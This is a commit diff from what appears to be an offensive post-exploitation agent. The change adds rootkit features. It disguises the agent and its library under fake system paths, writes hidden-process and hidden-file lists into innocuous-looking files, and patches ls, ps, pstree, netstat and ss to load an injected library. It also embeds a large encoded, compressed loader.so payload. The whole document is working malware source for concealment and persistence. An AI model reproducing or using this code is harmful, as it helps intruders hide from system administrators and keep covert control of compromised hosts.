feature: hide PIDs and files using loader.so

jm33-m0 · Aug 2, 2023 · c54c5f5 · c54c5f5
1 parent ce5d3d1
commit c54c5f5
Show file tree

Hide file tree

Showing 6 changed files with 232 additions and 42 deletions.
diff --git a/core/lib/agent/injector.go b/core/lib/agent/injector.go
@@ -89,7 +89,7 @@ func prepare_loader_so(pid int) (so_path string, err error) {
 	so_path = fmt.Sprintf("/%s/libtinfo.so.2.1.%d",
 		RuntimeConfig.UtilsPath, util.RandInt(0, 30))
 	if os.Geteuid() == 0 {
-		so_path = fmt.Sprintf("/usr/lib/x86_64-linux-gnu/libpam.so.1.%d.1", util.RandInt(0, 20))
+		so_path = fmt.Sprintf("/lib64/libpam.so.1.%d.1", util.RandInt(0, 20))
 	}
 	if !util.IsExist(so_path) {
 		out, err := golpe.ExtractFileFromString(file.LoaderSO_Data)
@@ -102,16 +102,19 @@ func prepare_loader_so(pid int) (so_path string, err error) {
 		}
 	}
 
-	// see loader/elf/loader.c
-	agent_path := fmt.Sprintf("%s/_%s",
-		util.ProcCwd(pid),
-		util.FileBaseName(util.ProcExePath(pid)))
-	if HasRoot() {
-		agent_path = fmt.Sprintf("/usr/share/bash-completion/completions/%s",
+	if pid > 0 {
+		// see loader/elf/loader.c
+		agent_path := fmt.Sprintf("%s/_%s",
+			util.ProcCwd(pid),
 			util.FileBaseName(util.ProcExePath(pid)))
+		if HasRoot() {
+			agent_path = fmt.Sprintf("/usr/share/bash-completion/completions/%s",
+				util.FileBaseName(util.ProcExePath(pid)))
+		}
+		err = CopySelfTo(agent_path)
 	}
 
-	return so_path, CopySelfTo(agent_path)
+	return
 }
 
 // prepare for guardian_shellcode injection, targeting pid

diff --git a/core/lib/agent/persistence.go b/core/lib/agent/persistence.go
@@ -25,10 +25,26 @@ var (
 		"patcher":  patcher,
 	}
 
+	// Hidden_PIDs list of hidden files/pids
+	// see loader.c
+	Hidden_PIDs  = "/usr/share/at/batch-job.at"
+	Hidden_Files = "/usr/share/at/daily-job.at"
+
+	// Patched_List list of patched sys utils
+	Patched_List = []string{
+		"/usr/bin/ls",
+		"/usr/bin/dir",
+		"/usr/bin/ps",
+		"/usr/bin/pstree",
+		"/usr/bin/netstat",
+		"/usr/bin/ss",
+	}
+
 	// EmpLocations all possible locations
 	EmpLocations = []string{
 		// root
 		"/env",
+		"/usr/bin/x", // see loader.c
 		"/usr/bin/.env",
 		"/usr/local/bin/env",
 		"/bin/.env",
@@ -182,15 +198,44 @@ func AddCronJob(job string) error {
 	return cmd.Start()
 }
 
-// FIXME this is not working
 // patch ELF file so it automatically loads and runs loader.so
 func patcher() (err error) {
 	if !HasRoot() {
 		return errors.New("Root required")
 	}
-	so_path, err := prepare_loader_so(1)
+	so_path, err := prepare_loader_so(0)
 	if err != nil {
 		return
 	}
-	return AddNeededLib(util.ProcExePath(1), so_path)
+
+	// create hidden list
+	if !util.IsFileExist(Hidden_PIDs) {
+		// pid+1 is for elvsh process
+		pids := fmt.Sprintf("%d\n%d", os.Getpid(), os.Getpid()+1)
+
+		// mkdir
+		os.MkdirAll("/usr/share/at", 0755)
+
+		// PIDs
+		err = ioutil.WriteFile(Hidden_PIDs, []byte(pids), 0644)
+		if err != nil {
+			log.Printf("Cannot create %s: %v", Hidden_PIDs, err)
+		}
+
+		// files
+		files := fmt.Sprintf("%s", util.FileBaseName(RuntimeConfig.AgentRoot))
+		err = ioutil.WriteFile(Hidden_Files, []byte(files), 0644)
+		if err != nil {
+			log.Printf("Cannot create %s: %v", Hidden_Files, err)
+		}
+	}
+
+	// patch system utilities
+	for _, file := range Patched_List {
+		e := AddNeededLib(file, so_path)
+		if e != nil {
+			err = fmt.Errorf("%v; %v", err, e)
+		}
+	}
+	return
 }
diff --git a/core/lib/file/loader_so.go b/core/lib/file/loader_so.go
@@ -3,4 +3,4 @@
 
 package file
 
-const LoaderSO_Data = `QlpoNjFBWSZTWasa6I4ADg9___________9_____3v________fW-fzz9___9db_____4A7Ld777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777774SmogBCZGTQp-RNpo1Gk8mlVVP__aqqp__7U3pRVVP__VVU__3pKqp__5VVT__0yVVT__epiqqj__VVT__2lVVH_-qqj__MnqFVUf_56qqp__tVVQf_-qqp__lVUA__yqqf_6qqf_6qqf_40qqj__D1VVD__yqqg__0qqP_9Kqj_8VVH_6qp_-1VU__ZKqn_5VU__aqqf_qqh_-qqf_lVT__VVT_9VUH_6qo__1VU__0qqf_qqn_-qqgf_6VVP_9VVH_6qo__FVT_9VUf_vVVUEiSEExMJU_DSYVVVT___U2mTIPVVVU___1VVU__9kMqqqP__eqqqj__9NqVVU___01VVU___Kqqn__vSVVUf__6qqqP__9Sqqn__6qqp__-1VVU__9VVQ___J6lVVP__Cqqj__1VVH__tVVU__82p6IqqoP__yqqp__5VVT__1VVP__VVU___VVVP__VVUf_-VVU___VVVD__1VVP__VVUH__qqp__qqo__wKqp__mlVUH_-qqn_-qqn__6qqof_6qqf_71VVR__qqp__qqp__qqp__qqp__6qqg__2lVU__2qqoD__Kqp__6VVR__6qqgf_7SqqBKahCaA0pp6aaMJlKfqbaTalVVT___1MhqVVU___0VVVP__eoVVU___aqqqP__Kqqf_-8iqqp__41VVR___qNqqqof__6hVVT___FNqaqqp__-1VVU__8qqo__9plVVR__-qqqA___Qqqp__5VVT__1VVP__8pVVQ___RVVQ___TSqqj__yqqn__lVVP__0qqo__9pVVTH_-VVR__qqof_6qqAP_9VVP_9VVP_9VVP_9pVVH_-1VVP_9VVAH_-qqn_-Kqp__qqp__6qqn_-qqh__qqoH_-VVQSJEQ000I0Aaqqqf_-3qptT8o9UyKqp__lVU__3p6qqqf_-qqof_6qqf_71VVT__yFVUf_-qqp__tVVR__qqo__zVVU__xqqqf_5VVP__1VVQf_6qqf_4FVU___VVVP_9VVP_9kqqj__VVQf_6qqP_9VVP_9VVH__qqqf_5qqqB__6VVT__VVT__1VVP__1VVQ__1VUA__9qqqn_-qqj__aqqg__yqqAA__1VU__1VUf_6qqP_9VVP_8qqg__1VUAAf_6qqMH_5qqp_-qqAf_hKaJBJp6qfoyNNDRpPU1NPUGqqp__sqqp__-p4ptT0lVU__zVVU__9NFVU__2qqo__wKqp__-SKqp__tPRGSqqD__FVU__wqqn__oqqn_-qqn_-VVT__9T1VVQ__9VVQ__9KqoP_9VVH__qqqf_-qqoH_-BVUP__VVUf_6qqf_tVVD_9VU__KqgH_7VVR_-9RVUP_yqoP_1VT_9VUH_7VVR__qqo__abU1VU__VVP_zVVQ__VVD_9VU__VVP_1VQShEyIAjRiZNVP9TRVVU___9TKqqp__71GTT9FKqqf_-qqo___Q9R6iqqj__2VVVP__002jVVVT__9NVVU___1PKqqp__5VVT__9PUqqoP__Kqqf_-qqp__7VVUf__qaqqj__NVVT__PUVVT__aqqn_-qqn_-VVT__2qqqP__amQ0VVT__VVR__6qqj__aVVT__xVVR__qqp__-pVVP_9kVVQf_5VVA__3qqqgP__VVU__1VU__yqqf_-gKqp__vUqqgA__9VVT__Kqo__xqqqN5Fcjw-V8f40s36g7vYY7I389_uPG72HFuN9qcP-4HSdz_CMPwZDH4A9Zqbq1fY_P3GZOesvoHRlvp2eFjTcKtj-cJLZTHUm1ye8Us7O4klMcUYojXjiaKKLoP8OeZj44yc_lPdCnTpSc7nEkmjEU3RlLnO7JUTm3hRN8E548MpN0K-5S9LZwznSHm4CwsDgzeb7mDaKLlai7oeDFDcKXHldxrZiBTqVTQ1-J4v4enXCS1IYdHSf7EatRYjSlev4uJV27E4llZXDMWVorNSot4z99NWhNNSlnsWbPi6nE8bk-BXyrvFyt7xt1kY-Pl5fI4_J5GNSRc5Xh3L2Qby-52W6UToi6BmNAuHoUbUt--sxILvggGwTYgaDmtB-CKMuDe9mj9nX62Zn_dUZqGdXpCrp0QwDGHDXiiW5HeTAyJTfa-asoRd71Nzp0SJfjBnnPFzpIQUeNRIoghD480hghvkrP9EmYB_v7Hofh4__fl_HW4fI6H9979fL6err-Lt_vvvX2ef9X-9bY5nV2t3jHidTud3rY8CKoy5rMC3-FwHhBTv1JxHx1aiyGZov3jxpZ4poNhw7SRIhIDvqKFwxAI9TypXsiarndn6OjHCjrv_1znYdF9zO5aPxVvh2_MpliXldZkjeMdrDlWYFLs-nFXZ8uhaiPER-iNSLYkhLJ6Mvpblq3Ov3NnF2ru3fnHnV9v07Vzo5O1zL3JzqXqbDg7VGGQISC40hBJgg7bEgJMENmymhqE3hIkgYgVGUDveHHzXeqUPM5lppNCdIGlVEnKJVVHKqhQERN-I7kvROUcp7kKColgmZEeoJAJHSTFAgChAwxQihBZTHnL0E2ymnncCEjnNJJDZZskCJMBsGwENg6goGHaLmYHJISZg73fczMNURdQHVQxGhoIGxPehL6PCxKF8u38nZ8Prz-LlpubVHLd-ei--SDx9WD2t-Ovv5SAChBgYjlLao7DoGp0XdNAgGSAKOPZI3T3ab7yhg97I5K-FGywtf5rOJhe1Pijp4IDK3VnSyTyWX_y_O-GN3kcuy6ljZnQ1SbXpxg1oSEzMIQ1lYymBAFCx2iTSSbSGxC1wYhT_5lyjP-_5jk9yJb_Op8T6-LIl5HA5ZLEEsrkmSTKXNDf89cfWsdP8vx7s13W8rRdNVWGZ2mi8Zwha-Q5x6KS0FHb92L95f5I-9C42AIusP7-A20CaoegtIOgmsQqMwzOd8GLSzdFDMNf7OLrSZhs9bYwhMpQEwRUTpGLL5xCQQFUQN53drLdVY4sEcomGKtjqexXhZmG10UlWQmZjbTA36wQMMqzOBnIagMCOIOHIyOjErzG7MdWSCvXELNPJDBSkXbM9Kk8mwQnOKOWQ--HacASfvGRxtMjdTS1B7NEehE-YBbOfk4qd0uNjSAe9fjmoGNpC2BpYDaxcaZeq3Thi60pJh3JQpUE1d2sd_XhlTl92Xa06Wx8UyZBEqYph1P2mE5y4tVpM7wvt8t_Tgh3nG-zek-Q89SXydeT1qH6bO_-D3Z6CXqbJ0UCVPQObkdD5P01sHU4fDmKCjbGHj2er4xp8_nQEPhN13gZTA_mzoSLOjblra2sSR5HIJgjY57el3aSF4of77Xyy7Txfw9Xp63f3-T2_6-Oh5lXV-mA9mA6_D8X6odz39U1Q5o4eMZXeY1fXMnitttttttttttttt2vPy9LNw5MmXW1taRfqYHp-T1JTfxzI3HPNPvrGk4xwP2ppk09mUudWKr_2FVFEzwCU7ygjDDeZxP0m6ibTibQKJsUJJM-zSe_wD13vEHrY5_Xc_0G47qTmuXs-SQqQY2Ot9_q-fb-KnfbjrTyS17UBk_l6WHlNm5o-vYs9XnQH2NDdsQPzpPRt3YlmbkprajMEnubcApNttodNR8kSy8YuxilUnu_awzcr67PZrygNX3ujZhFuLZzLd-vNvnZjLhmT6_wobaST0xlQe9GTpFNX59_-vVu0cHJFz1pnQ-k6I1sQHFBU35Gvor384_qOnlDuji5GfVLp53E-3NLO61NMl7udw9LIart_lw5aRd38HqA4ex3LW99WyqfT9E5G5oxwahXs1Pkgufp6vxMLa7f-f3r9r66H7VebknDmmmm-nk6-lz_52uX-_7dvxO37m19N7p8a_p9bP9P2c-1cL_CdsfLwCPWZoT5wc38CATGYVNzl8xeNHK9KvWEavQgPH6ff-zw7hRqdcMPTr4YjU_a0YNUejP232uoVi3USSQhMkwJDJDJJAhDCQkIaH_LISE1qRDSFDFAxjTahoUDGnH6-nEERA0mQyk0iAcHcbXIZoZtgkAwiZxVWlgWthgwD8ffJLXw7DkZR3O2fj0XsyxkiSZ3UaYuqRRHphIQ6UkckDEBAJmQkXuwTnVJSrXrYKcSQpImvZ8uXPk070vQ_tnPSR8cF3dmwTdnOoY1YneKSx95QienI4VUxjHf8qaXOnziDNBkKqnJlbp2n1ulTDFljMTpa5kyOxV4QacQtxJEuAhjYV5RCvn8FJcbaWzyOMkEf0OEWYjJlNEhNJVNXmdG2iX43vjadgbk41Cjoy2n8sQ20EFcMBFfTlPMcvvbLjkSBhzon1LPuQvde--JPH1L1aJ8QsRz5UzMS3jhP3wpCTbXgzU4sKRzAuA6ZR3slRQt6OphEbbL_1IL9jKi-lyT-GKColSrxiPXsmFacMNL888iR3ebL9qgQWW9MlqcIxS6UXDEn9mPoKahEbDnKDIxdy4b0zohnD2IqZQITFr2YQBMQs7EgiACygq7aexKRo8Y-fqkjf9xt63Px93Xq6970oNnhcmLeSN1uAZyicQFN1qi8NkZWFXi06RpJWOJ7OMb23uPB9vreRLo9jW2bdivrZ2PpbvR32jocXUzNW5j3tdmbdb_MN2w97whzoHgOec1DtnxCpGaZmbR2PX4vBM-f1T-CLFu9Z7PHPn49P0V-6qMG-xi3WhNkiyhw538FonwJrSdN41upiW7E-rzMBRoyzvkhpfsu5yDt_EaD8GwFY9i_Z9mE1rOsPB-oz9F-_dtbnEjVxq7M-ub6v3TXgfrZla7tIWUejfe0Y-VXn-ataxGxOvWtMwF1M73rx5GEW0CyWjOQn2_3rVJkxcWsFTIBeax0ON8tjoozXMyGCYsipgukO-iOplcjILDQy8xZpPE-GAfvRIhFBmWZWeWyIH0k10TaJdrSRTs0glnWIEcZoFHCoIovoupCvvZLmbYwMUcRgDFzKUyKxYrFO9Zczi7m382hCPGU92PRnb8C_80lYgGIKpu1XLLhZm_LQ6Me7XWpkoinXv07cyiTvqKscFNMlenREgJrheonKJ7rPoFm8rZbwmpMokKatiEsO_ilo4D6PtdrGIXFxsQeWSljs6NanlbkFyMSzQpaFxPNx7ZtsgtpVnWoOKxuKMGco1G2SoXJrrzn0iB2K_FJ6WS-TGqOH1H1WpTvN-56lyrbqsrmPGqKq3i38rcxOpqWJU20UlGAy3fwrlUphyitgUVpHAmdMz3UGTomsSZHwQsVAs-O2WUhxSvFCwX8FVnnDduyOHYhIOfeC1_hoWS1bMZNVbpzwow5sWronq-X7xhOr7iNxjG0hCsXPM16xVqlRm-W5uLLlQ_lF7BFPas8UxTwy5u9k1jc8bs4C3DyohOROwtS7QdMazREcMhB2WyusRpqW-6RDbnMYSaBMXBDDJCEJCBz3KS1WSpFSCoyEKZlU0xFM-Bq1kRkO9kzZF8haTVcaZdgUMSaYt9bQzkJryZqjxwNrxg4KiZmEhmB6ZjsCBjLDnEhtQ0l7aZfBiSPhYlv169E0mDOxCUMCQMZCDCR2g_K5sgablv4iACmnepYSSSY9V0dhMnuBFBMJQB6h3Cg0BXMN2fDcSPJZ93EHZKkfMhpQQPHM73_emxZyMjMHC0dqA-aiuqzMQCYYj9ZwMXCcgQt6MztOEZQNCC8NcHpoW0RM5hAzOs4M69rYOL5eNZhp8HLw8sz8nDNt3K5oVwkKNaPS5WOcASTMzGK6rU_bFjnqF6_RXgwHfK0ngqqWCqv0MRhwWWTRTcIO68WFBZd2qkdn3ujNRyKvztyavY40Y2OXLmCiy9NlZGNNik8DMv5ufcuIEJqaYCpgLT1Al6IwRChwr3Qzb5NlNluWEkwV70KYYdi9FjZTeumqqRzuv7bi1iErYueOxdoMAgEFx-A61EAfXE5LKXxU6Ye_hIQi-w3MDGhAxiE6CI2v1G22fvjfmhI82xarEYxRZ6YBxjOEkcFe5Z9uEun7qg_2LwVJJF2vV2hZShRrG6QrH2R8zUDsV8zcqvgU695YLvBnGO8TUzjk0AEVMDJxmdtF2cQ2g0oidmYW6iIqgMyID6srOQBSBRHJjJEZUpUz6HWUrjBJEntwXTsw2CqaJhU01VhMMgEw0-GL3aOJC6bNLAzmpCBjAnEVWivMRWZcO_qke9pbHe7dzCwT_uhJz8v_02RP3cf6LjB2N7jfyQjuNke94Kd08jwkyQJkSOhwkDNjbJ7ZzaCTaCpqGG_4uhIPOlAURVIZsQpqTjv1HCpMxgJhkhm3vM9vz80_Tc9_lYvN8nT-mx4CzxGG2in1Pu9XUv6X9f70m6ubdyVMwtqNx27RhYf4T99zNX1NP8_1sX91VPSVEzF4KjZ-jG9uCvHLodSQkPz_q1_dXQ1KGKhUcIR0u8_ydWDzOX8Gl8Pm_pyDu3f6-rzfb-j8ukvd2eTbmmg8-JdQ3dWNDHVy3HGbyWnMsSedExz3ZOBx5PGn-DSfxOt-uxTAatWVFm1PWqj2Zhkj_LBHV6vUq_75n-97l7nv9TizZ9GPHjx49nr7KSXWTBEhrhYAl4mez9sIGbzhZqGPZQkMN8NX-QDD7yxKQwE66Sag7GDmSmlbg_kr5ZpAgp_Cu_4YZZO26I9EYGX75oM4kGVkXQrVn7kVXtf9_sVOigl6dSby4q-E-GnPuYSaSSKEbtd2nZVtQtglbEhrRiT0Fu1IrWrBWr30qWDwNOsAdppdItCWIDPuDQ2BicMxES58_P9rWlc-NzccpkklAgRyRyTz_qMtA0yIwU6XFw3J2WacWnTp06dPlWeol_wu5IpwoSFWNdEcA=`
+const LoaderSO_Data = `QlpoNjFBWSZTWU7ZEFIAEbV____________________________X__9_9____9______4BLrd777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777774SmoSYmgak2g0Mmk9VPR5EwaTVVVP__yafqqqqP__VVUf__qqqn__tVVU__9gjSqqn__6qqn_-VVR__5MmJgalVUf_6qqf_-FVVAf_6qqf_6qqf_7KqqH_-qqg__9VVR__qqp__qqp__6qqn__k01VVP_9pVVP_80VVT__VVQ__wqqn_-009VVUP_9VVP_9VVP_8qqn_-aVVT__GjVVU__1VU__1VU__yqqf_41VVP_9VVD__VVT__1VVH_-01VVD__1VVH_-yVVT__0Gqqo__xVVP_8BiRAI0JpiVPwTYj1EyaJgh6TRkVVU__9oqqp__-NSqqn__4nkmqqqf__qqqn__-kKqqP__0yqqo___TRpkaaqqo___Qaaqqp__41VVT__9KqqP__VVUP__9RVVR__5VVT__9VVU__8qqp__6qqn__qqqH__qqqf__pVVP_9qqqf_7Sqqf_-qqof_5VVD__1VVP_9VVAP__VVUf_7VVUf_-mqqoH_-1VVP_8qqj__0VVQH_-qqh__6VVR__6VVQ__9VVT__CqqP_9VVP__FVVASJTRAjI09ETTT0mCabKZDSqqp__-Kqqn__5TwSqqj__1VVP__NVVU___VVVP__xVVU___VVVP__NVVU___JoGVVVH__tDVVVP__NFVVP__KqqP__1VVQ__9VVQ__8qqp__-qqqf_-KqqP__1VVR__-qqqH__qqqf__pkVVUf_-ZKqqH__qqqf__qqqh___qaqqp__6qqj__9VVUf_-VVUAf_-qqoD__yqqn__5VVUD__yqqh__-qqqf__pVVB__qqp__qqo__1VU__xqqqf_6qqP_9VVAf_5VVAA__1VUGJCZIEyaaNT0yJkU9k9FM9U2lVVT___U2iqqp__-yqqqf__qqqn__6ZKqqf__hFVVP__aMSqqn__qqqP__9VVVP__VVU__8FVVD__2qqqf_-1VVT__yqqn__4hVVT__9VVU__9qqqn__6aepVVR___kqqqP__VVUP__0aVVUf__iKqqf_-qqof_-qqp__56lVVH__lVVH__6qqp__-qqqH__qqqP__yqqo3_-09VVU__xlVVH_-0VVT__VVR__qqp__qqo__1VUAf_6qqP_9VVP_9VVP_9VVP_8qqn_-qqn_-qqg__yqqAAEiiCNA0mSn5I01VVU___CntEbTIqqqf__o0ZGlVVP__xNVVU___J6aRmlVVT__9VVUf_-YlVVP__aqqp__5qqqn__5VVUf__mplVVT__xoNVVUH__6VVU3__qqqf_5VVH_-qqn__oqqn_-VVT__Kqp__mI0Kqp__6qqj__Kqof_4VVR__qqp__lVU__9VVQ__9VVT__VVT__VVT__FVU__w1VVP_9kKqp__6VVQ__2lVU__1VUP_9VVB__6qqh__qqoP_8VVR__qqp__qqp__qqp__lVU__1VU__1VUBKaRCBNoamk2jTRCntGKVVU___yVVVP__eo_RRqqqn__sVVVH__6epkxDVVVP__VVU__9VVT__zVVVD__9VVUP__01VVT__9qqqp__7VVVP__0GNJVVT__yqqn__gZVVUf__kVVUf_-qqo__8qqp__-mlVVP__1VVT__8qqqH__qqqf_-VVUf_-qqp__-Kqqj__1VVH__lVVP__Kqo__1VU__zVVU__1VU__1VUf_-Qqqgf_6qqP_9VVP_8qqg__zVVUH_-qqgf_-qqo__2qqoP__VVUH_-qqn_-qqj__FVU__xVVP_9VVN79kdyTA73v-HxfN-ifrZ_SaX3g6nwje_8w37df8Xjfna_3-CVxzqLypQgB0v7xiIHqISJgl3QGHtJioLc35euhjd4cnzxcdiwZOPLCaNXT4nrJC9cQ2MHXYpeeWJMwqu79Dmm43ltWKJFqrMbOXAmHBUYxpz8PLojQlKT_E8Y15b-UpN4WDGuKKcFCMXYVUMJp-2d-rVqyZyGFnK9upUm7mMYzWizOTTTXkRjG9PJJJmsSSSSdRng8ZMSnGOzKhQrffffy-pkUE1LDw7l2EoXY1X1cK9kJTu-9dslW9NFhwvFUYfCvB6pTKA7VU9WjUSO8Ku99GkmxcGahDTojfrNvSeLkENVoFr8PuyXr8GDbRbenuI9TZ3k-dNg59fbXNzg28XysvOz8jc6GVjanV8vb8rf6eDf4PM1dXc8zxvNzqGaZN4b26zzDxGRtHWHESmWQCWowDdLPj5D--XSRABigNwiCBoMR-aBoz3vb6up-Gt3NPS3XHq1Givf7C5aIjypgQhafTS37sCdzeC8dpIFGR8XjWSUOhJLtYkCHUfKjG1pRiwDSaEu_3EhAQy1HGYcOlSfmQGYHYX5eJqul1f06fU8HU7rzq-tu8Ljc_O_36d_f3PW2nuw-rgffj-VqOdj05e6VRFy1bMAtY4ZWzgAhexGYolDxeK6TwEGGcoqZYVHABxwNtzZpILWHRZiaXFx5zoSJNVWI03WohBJtrvjK7q0XBzm_nuYcD0VXrcXXUKPN4P61R3jcrevUacLzLPI1EJhcQVfXO4lmAUODCHq8fzo2XKlmPbvKesypPDml7-pPv99Rjb_h67_2hr-FptFw-HjZ_k5mn5WfWNHfY8Di5mvyvMy-Nu8y_nVdTgUpYoQ2pM4wMzN6KZgIISEJhJkhkCSEJCiTM5CSSESBgsxYJBJAGJAm2iAA9QIvCF4sXEitAPgWSZl7CnJ9KIduVQmJoIVDJzZEq1SeuXs2CzIE8W1J5MU5zEvCDnMC5di_rlyJB4pJe4jyxpNMgK6AYhGCVVsyYwi2NpwhFlhpcZhgDvsnTFO0CTJMMwO6d0MyevArobXINNMdBE0zswwzcJAzDJE84hwD0Akwkwwy4rgdcYZzGmg7xWJIZLisWQBPvdbYuAINhRoAjIKB1CzUFWaKG2NibAbFw-6xKEVWg86WHl9Lnd2iWtrVKi5kOjLrwpJDb-9hzCHXmBsX7a11uy_Mxw8gFyJ-PkYNa1A0Umb4zsUotIK7bUDUuA2IBoYhVb-L7sPAltPCRsdVqrkS1LjS05HeoYN5VIO1OYAbKqQ1hF_Zq6ulWKrzVMvVzUqiq1fYpzVKFOs7dbXCdaha2Ra5N9fJi0IQmw0Mw4Q2tYkYSIkAQIFtToAuREKCRCCDIEJFJA2ANpIOEDBH-7OI2tvOOd14c324NpW3m8grYnb0SUAZSZIJIJURQyz8Ftejmo2uh4ON2reL0-lk6Onw-32Ops_i4-q3aw9xytpuuF0-lqcntO8-SrCi51tl1zZaKOffZHlnihEy5iGRjHEN2ksEk-D03pVG_cgfEw3YQDMeoYwCaNtDdFGLPGDzXy_frfJ5H2-fg5V5M59mbCqs0_cOZmA5OC7MoANUjQjAhvbTDNQSIJhCIDK-CAbQF2D2A-AEFIETonK2e8EO6om9j1aopNLMG7vu_LyZw-9ghe9iKBukBPFhAvC94BSNcogmoNG-CQvP8UJk4ZXMZ25CCVf3dUOAFNIhagiywG7SkMS3KTTvV4tJFwgWPIzek4-Dqv9yCr4nd9D62ivEkcdMkJNF3QqCDkDs0i1Sa6vXgztR9X2-l1s3Q_m2TA0xHM8tgYxMD21OakI0hAyQALP1tzvodqwAQSBAEomLBBE0IqoMrfmlTyzv2dGyTFJJJuIJTSIKJ2DswLxfp1_hycOhFUuTbPkGhRQPtejO0wOi1aZlfdDBcQdP5sXeBJWYS17E7-4PWUzxpqPC3rgTUiystJubIMLg3uP0PUzPm53T2_2arbF54PcO2XC5qRBCLbUX2owaXJ5vOJCW4z0Ib2EMHYofNE1na0QN_t9MgaWWRB_D3aWn6cYGSGryeRzcOL5eH5O26HpfhyJOX-7tzPrPFgPGYNfx_ix8j4KB7mL-jubtclZB2oGaHCAEB_mAbpR_CMbg0UUUUUUUUUUUUUVh4-xhX_UxqmNtaaaaaZ6aaaaaaMW2wDReVx82Yn2hmhxPL69QqFTQ73EtuBGfNMnb5IIKimA998FvujSHEwITTM-6IEOmAU3BjPkBj5BP56_FTR5jovlgLEkml7rOYNM02wLxzP0-OdzoCfs3YEKTPpwsQfQsQLKinqoXN5m3hHg4_hZbeAtoawu8GJrOAuJelxunkD699geq_UtC5e_rFCye5g2Il_6hyJSnrrUlDsV2fcYbWpzsdi5JJJJJJJJJJJIjjtqo6hg_bTuhgi5Tuyn_Bj_J48-FuYdjXaGkbIjRLpVO5s_7YTbe3qaH1fz-f7d_9e9ttbUtoFfOXWFX7dK5gfdmNGMKGdS_Htxjs5RD7UMjhN6cNlUn0h4Ao84RqofQgeI2yLRq5IxRrseFh17eTiusq3vdTnR8zeFYJtbQQVTeSEqnz9loegQeCOMsEmSS3Rdu90T5pfFsG81Cp7zSt534Kg7c3XEgQ4_QydjT7Tl6EwM3UPDNeSSQxrLYR2daL0JKBb1BUxrZa24IKlEumN9mXOh7I5NWvJacLwX2thq-do7uXbv-3YW2CtdP_uf_v9dr8OJ7vZ5v8dj4_6ucTn3uz8V7Tppppppppppppp7Hi3PzeV3Pwwdrjbvgd7V9n299sNBczhZvA7E_T-nnkuH2AMf8HKYAMRdE4fl8UcY57bj5Ru7A3g3lUECigR9D-ehcJeXU5QXtnE1lhIIbTkeUUV-fDcw6psxmfNl49apCGLyPmKZiFV9dhYTukhCBIYSbITJ3GSSBCYZISEgXMc5kwzILDhhkhnMmSZJwmGciEAgEUS33eq5wc5xD0QiECnl4cAwLMQ4aG-oOGpJSS_gmAQyUD1-E8z3IXUuwUkHR13HEm6es4sg7U-rV817MowiIf13WnGShElyISCDTiTJgiQkGky_z-LJIcKJcnwLR0TCjecCpG0khyVIs1fnQ3s2TMGyIWer8jnCZmPPcuxjQPE-j-AvViVXS5VpGPNjPGjhKN86B9aZnMkIMwWDDf7KaXf0pCAyg5CV6mC3oZgjiV8R0BV9xqgE9yzPTlNjgj5eALVoLFN6a1gBFKIWYkibcEMbC1LOELYWcsf4k5WQrrNixf5PH14zFzmUGg59Ji4WU-BYz1ZooOfDEnYvZpg4OiXPEkvJhnYQP4xfaVVAuHiTMqUFDI3IOtVI82b0RBoK6JSCCmdWz7_vLAnJJnoSqAOuTE48JHp9GJ6soXZ1MdZWMmXPZemfWpSPiIord_Q6UIzgrRxUkzMUrMdh2gizgsfmKd95E5gkH56WpBUanlgx0y66hAMM5_RSfdGoSqnUDSNSlcHe-hX8ti6xllSw5Ez4tyzRYDueKpIklYpjOfRxTL0YEKt9lBXBMh-jrzivhTkknoLKFkbMUGBFSev_rJK5oKfNrU4iUM049EdZxGfhWNDKUBpgzIUMwxCYsa_cugCYhtihIIQAKEE-bLZaMS42zjwz5fabffPuymbS9vL_18LxcqtQlrG47fW8DBtGVsebsG2aZtoV0Obe8QSpJnOHLK3FU07IzEt3I2LOtC4wx_GxNLtPj3e7k0vxWbXD32-1V3YZeu1mZ_7AwL-3keDhbLL4BJxxpIzs-YFPm-RBtPSJuzq9I_8YcWjBgv379-_pW7-DKwPAQZWNT1NxtBPDku872hnD9psfNxM8fXn5UfVEVokCdEJDrZeUkgSimhjA-00qrVtbjm1xzA2OPprlzIxLFiS7rCzJgUz0Wz2L2I8ajYdpdrpXenlkH5nTM37owxb1oK4qEk2OQ5V5sa0eCKSx-KG-GxeXqUHPL1p2lgcaC3B22ITEKAevlVDNUpCwhYhSLbozGRl-utYw1Uszc6ezBakskkCSiqJ-oxaxUhjIk5eBBPVrzTAX8-NDrwsKcctfWDND52czWx2ZWLNwencMlTzwlE29qKMItiYPFUw_6dyr0LsUHxYYr8oJCYIQjhbCg-ritdM5EL6UKhbgQGsktQDEdytOiJo7cEJDwLJpMYcpCqTKpYHs4rMNe5Zh6-4YxkLBNXczArxntIxSXDMYCRsiyk2Zr5zf30VHAcsSSjkR4lXD0WR5kxkNjVcyQYriwrFKMrUIyWSqY_LziGnhktXZKheHM0eFOIbbxA5TSuE8LQvMidDeMHvJh0g2VWqVKM9RkK59A8JF3EVUzsUnIoK5SS7fd5GOrhey3k9De_vGarAey6S--9M6OGXLLcMQYmBtgHPtfv_4bkZgCp43Wxsitx7_YCRtmRcR8ETUS4p13XmKq8poFNEV8qy41mBAJHUdRaSWCdNmwOPcnsyp43nwGvFcsdtAq49pyDWoY9ti3RWontuUmNHB9Su-o-eW2-FelSqx2TbDWkGTOPowam4gRs4lmdN3jCItfIWazG1GDMgM4M8TNTGXWGgKwgOTCSyDUiozl19fuJXsQXFrsNsQQWLSr8bZbvYbG3KnG1K89dZr-7UWxuMyNKbAGxxDlgTUubdv-7Ywr0hLG5Qmu-kBipIIpJBFEK3a9DyoWO-rnPcmdGS5ZnpNjcVOwCpetVdib0_XcfnhPDOBOFdL6WF2s5SEzSDInTMW4kUX4J4wszMYSzmY3pz3Emgt2gxRDDJCEJnohRoyzpOHlMc4BMhMlDDKTIAhPKNwCBMe_lbB-itf4aqAAeSjGEVfMWQAbSBjSznShNjRaaFZmIEufQEBYaSGySA5EAe4ESDaQSIJei4MwA88oUQEAkUgrNGEwUrQivniaKEwZgtBdaJpEoIGhmMRBTRXH4nMizNJxX79DAZVJVEkkx5btC27c4KDA6vv6EGGagg7JAOeJ7h3B7l5EMQJLzMWB_QQi9OCd73Bi3L5kuBMIhEL2xxuc8d9Zp3hImUAQAMaPCR8DQjPKhAhaA0iMxdJ1iSQjTGtNnvoXwE0pEgMYXdSree1K9stpteNaxH7-hO-hlDgcvdmpj7YRocyDncuyM6yZ17dM-vzZdG96QSSL7jLYuWyr-VvRzE10ktVXZGYca_NHv0w6VirVqsSzm-kp4FY5